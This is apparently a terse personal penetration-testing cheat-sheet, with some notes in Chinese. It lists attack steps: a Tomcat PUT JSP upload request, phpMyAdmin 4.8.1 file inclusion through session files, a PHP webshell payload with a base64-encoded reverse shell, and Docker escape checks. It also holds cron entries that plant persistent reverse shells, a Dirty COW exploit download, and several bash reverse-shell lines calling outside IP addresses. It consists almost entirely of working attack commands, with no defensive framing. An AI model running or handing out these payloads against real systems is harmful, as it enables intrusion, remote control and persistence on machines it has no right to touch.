cat /proc/1/status | grep Cap

https://www.exploit-db.com/exploits/42953  tomcat  PUT

PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
    
<% out.println("hello");%>

https://www.exploit-db.com/exploits/42966
Struc2

bash -i >& /dev/tcp/116.62.32.64/8866 0>&1

phpmyadmin 4.8.1 远程文件包含漏洞 利用
http://192.168.1.188:2003/index.php?target=db_datadict.php%253f/../../../../../../
tmp/sess_6dd19ff2088d22ac4b1bfb67db1a68a5

select '<?php phpinfo();?>'
旧版本：sess_ + session_id
新版本：可能直接用 session_id，但历史场景中大量存在 sess_ 前缀的习惯。
通常在/tmp
sess_6dd19ff2088d22ac4b1bfb67db1a68a5
6dd19ff2088d22ac4b1bfb67db1a68a5

select '<?php system(base64_decode("YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMzIuNjQvODA4MCAwPiYxIg==")) ?>'

docker逃逸
https://github.com/cdk-team/CDK/wiki/CDK-Home-CN
./cdk_linux_amd64 evaluate --full

cat /proc/self/status | grep CapEff 查看是不是特权

echo '* * * * * root bash -i >& /dev/tcp/192.168.1.175/8899 0>&1' > /niko/shrimp.sh
echo '* * * * * root bash /niko/shrimp.sh' >> /niko/etc/crontab
echo '* * * * * root bash -i >& /dev/tcp/116.62.32.64/8989 0>&1' >> /niko/etc/crontab

最后公钥提权
 ssh-keygen -t rsa

内核提权
git clone https://github.com/scumjr/dirtycow-vdso.git
本地编译
make
wget 下载



sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
sudo apt-get install nasm mingw-w64 
yum install libqt5webenginewidgets5 libqt5websockets5